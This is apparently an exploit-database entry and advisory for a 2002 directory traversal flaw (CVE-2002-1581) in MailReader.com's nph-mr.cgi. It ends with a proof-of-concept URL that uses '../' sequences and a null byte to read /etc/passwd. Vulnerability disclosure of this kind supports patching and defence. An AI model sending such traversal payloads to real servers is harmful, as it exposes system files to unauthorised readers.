MailReader.com 2.3.x - 'NPH-MR.cgi' File Disclosure

Author: pokleyzz
type: webapps
platform: cgi
port: 
date_added: 2002-10-28 
date_updated: 2012-10-14 
verified: 1 
codes: CVE-2002-1581;OSVDB-8192 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/6055/info

A vulnerability exists in Mailreader.com which may enable remote attackers to disclose the contents of arbitrary webserver readable files. An attacker may exploit this issue by submitting a malicious web request containing dot-dot-slash (../) directory traversal sequences. The request must be for a known resource, and the file request must be appended by a null byte (%00).

http://www.example.com/cgi-bin/mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00